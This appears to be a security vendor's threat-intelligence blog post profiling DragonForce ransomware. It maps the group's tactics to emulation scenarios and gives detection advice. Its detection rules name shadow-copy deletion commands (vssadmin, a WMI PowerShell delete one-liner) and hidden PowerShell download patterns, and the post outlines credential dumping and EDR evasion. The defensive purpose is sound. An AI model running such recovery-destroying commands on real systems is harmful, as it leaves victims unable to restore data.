DragonForce is a ransomware strain operated under the Ransomware-as-a-Service (RaaS) business model that emerged in August 2023. Originally identified as a pro-Palestine hacktivist operation, the group has since evolved into a hybrid adversary, blending political motives with a clear focus on financial extortion. Despite its ideological roots, the group increasingly prioritizes profit while continuing to target government organizations.

In its early stages, DragonForce payloads were based entirely on the leaked LockBit 3.0 (Black) builder. However, in July 2024, DragonForce operators introduced a customized variant based on the Conti V3 codebase. Its affiliate program, publicly launched on June 26, 2024, offers members up to 80% of ransom payments. The platform includes attack management tools, automation features, and a builder that allows customization of ransomware samples, including disabling targeted security features, configuring encryption parameters, and personalizing ransom notes.

In early 2025, DragonForce operators expanded their offerings by introducing a white-label ransomware service, allowing affiliates to rebrand the DragonForce payload under alternative names for an additional fee. This coincided with the announcement of the RansomBay service and portals, which serve as a data extortion platform hosting stolen information from victims compromised by the group or its affiliates.

DragonForce employs a double extortion strategy, exfiltrating sensitive information to its Dedicated Leak Site (DLS), which contains unique victim identifiers and leaked account details, in addition to encrypting it to increase the pressure on victims to comply with demands.

Operators leverage the Bring Your Own Vulnerable Driver (BYOVD) technique, particularly within its Conti-derived variant, to disable security controls and evade detection. Post-encryption, Windows Event Logs are cleared to hinder forensic analysis and cover traces of the intrusion.

DragonForce also integrates a suite of post-exploitation tools in its activities. These include SystemBC backdoor for maintaining access, Mimikatz for credential theft, SoftPerfect Network Scanner for mapping internal networks, and Cobalt Strike for lateral movement, ensuring ransomware deployment across multiple systems within the targeted environment.

AttackIQ has released two new attack graphs that emulate the Tactics, Techniques, and Procedures (TTPs) associated with the deployment of DragonForce ransomware to help customers validate their security controls and their ability to defend against this disruptive and destructive threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using these new attack graphs in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against baseline behaviors associated with the DragonForce ransomware.
  • Assess their security posture against an opportunistic adversary, which does not discriminate when it comes to selecting its targets.
  • Continuously validate detection and prevention pipelines against a playbook similar to those of many of the groups currently focused on ransomware activities.

DragonForce Ransomware – 2023-09 – From Public-Facing Remote Desktop Server to Domain-wide Ransomware Deployment

On September 25, 2024, Group-IB reported that in September 2023, their Digital Forensics and Incident Response (DFIR) team responded to an incident involving the deployment of DragonForce ransomware. This activity, which was initiated through the compromise of a public-facing web application server, involved the use of multiple post-exploitation tools prior to the deployment of DragonForce. These included SystemBC, also known as Coroxy, a backdoor employed to maintain access, Mimikatz for credential harvesting, SoftPerfect Network Scanner for internal network reconnaissance, and Cobalt Strike for lateral movement. Together, these tools facilitated the widespread deployment of DragonForce ransomware across numerous systems within the targeted environment.

Initial Access & Execution – Cobalt Strike Delivery and Deployment

This stage begins with the execution of an encoded PowerShell command designed to download and deploy a Cobalt Strike Beacon which, once operational, establishes persistence by creating a new service.

Command and Scripting Interpreter: PowerShell (T1059.001): This scenario encodes a user-defined PowerShell script into base64 and then executes it using PowerShell's -encodedCommand parameter.

Create or Modify System Process: Windows Service (T1543.003): This scenario creates a service through the SC Windows utility.

Credential Access & Lateral Movement – Targeting Additional Systems

This stage begins with the deployment of SystemBC, also known as Coroxy, a backdoor that facilitates persistent access, enables network reconnaissance, and supports lateral movement. Once deployed, it establishes persistence by creating a Registry Run key configured to automatically execute a PowerShell command upon user logon or system boot.

Subsequently, AdFind is deployed to perform Active Directory reconnaissance. After this, system credentials are harvested through Mimikatz, which are then leveraged to perform lateral movement via Remote Desktop Protocol (RDP).

Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001): This scenario creates an entry under HKLM\Software\Microsoft\Windows\CurrentVersion\Run to establish persistence on the system.

Remote System Discovery (T1018): This scenario leverages the AdFind utility to discover details about the Active Directory configuration including accounts, groups, computers, and subnets.

OS Credential Dumping (T1003): This scenario uses an obfuscated version of Mimikatz to dump passwords and hashes available on the compromised environment.

Remote Services: Remote Desktop Protocol (T1021.001): This scenario attempts to remotely connect to an accessible system via Remote Desktop Protocol (RDP), a built-in remote access Windows utility.

The subsequent stages of the emulation correspond to those comprising the following microemulation of DragonForce ransomware.

[Malware Emulation] DragonForce Ransomware – 2025-05 – Associated Tactics, Techniques and Procedures (TTPs)

This emulation replicates the sequence of behaviors associated with the deployment of DragonForce ransomware on a compromised system with the intent of providing customers with the opportunity to detect and/or prevent a compromise in progress.

The assessment template is based on behaviors reported by Cyble on April 24, 2024, Group-IB on September 25, 2024, and SentinelOne on May 2, 2025.

Initial Access & Execution – DragonForce Ransomware Deployment

This stage begins with the deployment of DragonForce ransomware, which, once operational, spawns a new process using the CreateProcessA API.

Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Native API (T1106): This scenario executes the CreateProcessA Windows API call to create a new process of a given executable payload.

Discovery & Defense Evasion – System Reconnaissance and Security Control Evasion

This stage begins with reconnaissance of the environment by collecting general system information and enumerating active services. It then proceeds to deploy a driver, either Truesight.sys or RentDrv.sys, with the latter serving as a fallback if the primary driver fails to execute. Both drivers are leveraged as part of the Bring Your Own Vulnerable Driver (BYOVD) technique to terminate EDR/XDR processes and evade detection.

System Information Discovery (T1082): This scenario executes RtlGetVersion and NetWkstaGetInfo Windows API calls to enumerate system information.

System Information Discovery (T1082): This scenario executes NtQuerySystemInformation API with the SystemModuleInformation argument to enumerate system modules.

System Service Discovery (T1007): This scenario executes the EnumServiceStatus Windows API to gather critical information about configured services.

System Service Discovery (T1007): This scenario executes the QueryServiceStatusEx and EnumDependentServices Windows API calls to retrieve information pertaining to a given service.

Impact – DragonForce Ransomware Encryption

This stage begins with the deletion of Volume Shadow Copies using a Windows Management Instrumentation (WMI) Object. If prevented, it attempts to accomplish it through a Windows Management Instrumentation Command (WMIC).

Next, it enumerates available drives by invoking GetLogicalDrives, GetDriveTypeW, and DeviceIoControl, which are systematically traversed using the FindFirstFileW and FindNextFileW APIs to locate files of interest. Finally, it encrypts the identified files using a combination of ChaCha8 and RSA-1024.

Inhibit System Recovery (T1490): This scenario executes the Get-WMIObject Win32_ShadowCopy PowerShell command to delete a Volume Shadow Copy created by the assessment template.

Inhibit System Recovery (T1490): This scenario executes the wmic.exe utility to delete a recent Volume Shadow Copy created by the assessment template.

System Information Discovery (T1082): This scenario executes the GetLogicalDrives Windows API call to retrieve the currently available disk drives.

System Information Discovery (T1082): This scenario executes the GetDriveTypeW Windows API call to retrieve information regarding the system’s physical drives.

System Information Discovery (T1082):  This scenario executes the DeviceIoControl API with the IOCTL_STORAGE_QUERY_PROPERTY argument to retrieve system drive information, such as the serial number, to profile the target’s system.

File and Directory Discovery (T1083): This scenario will call the FindFirstFileW and FindNextFileW Windows API to perform the enumeration of the file system.

Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by DragonForce ransomware.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily in downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

2. Inhibit System Recovery (T1490):

Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.

2a. Detection

Detecting deletion of Volume Shadow Copies is usually the first step that occurs and can be detected by looking at the command line activity

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (“vssadmin” AND “Delete Shadows”)

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery

3. Data Encrypted for Impact (T1486):

Preventing systems and files from being encrypted should be a top priority. Ensuring that you have layered endpoint defenses including Antivirus and EDR solutions is critical.

3a. Detection

Ransomware attacks are best prevented and alerted by your EDR/AV Policies. Typically, a configuration for ransomware protection is presented and we strongly encourage that it is enabled in your security controls.

There are three telling signs of ransomware activity in an environment that you could query for and possibly make preventative detections if your security controls allow. Those three are deletion of shadow volumes, suspicious amounts of exfiltrated data, and of course, wide set file encryption.

Detecting deletion of shadow volumes is usually the first step that occurs and can be detected by looking at command line activity:

Via vssadmin.exe:

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (“vssadmin” AND “Delete Shadows”)

Via PowerShell:

Process Name == powershell.exe
Command Line == “Get-WmiObject Win32_Shadowcopy | ForEach-Object ($_.Delete();)”

Detecting suspicious Data Exfiltration:

Detecting exfiltration is well suited for IDS/IPS and DLP solutions. These products should be configured to identify sensitive files. If sensitive files, or a large amount of web traffic is sent to a rare external IP, it should be detected or prevented depending on security policies for the security control. Historical NetFlow data logging can also bubble up hosts that are experience uncommon peaks in outgoing traffic.

Detecting Ransomware-like File Encryption:

Utilizing an EDR or SIEM/SOAR product can help detect and prevent suspicious file encryption related to ransomware attacks. Utilizing these tools to look for excessive file modifications (greater than 1000 on a system) within less than a minute of time is a good starting indicator.

To increase the fidelity, you could include file modification of file extensions to popular ransomware extensions such as .conti, .Locky, .Ryuk, etc. If possible, with a SOAR or preventative EDR platform, we recommend setting these detections to kill all processes involved in creating the alert as it will most likely stop the spread of the Ransomware.

3b. Mitigation

MITRE ATT&CK Recommends the following mitigations:

Wrap-up

In summary, these attack graphs will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by DragonForce ransomware operators. With data generated from continuous testing and use of these assessment templates, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.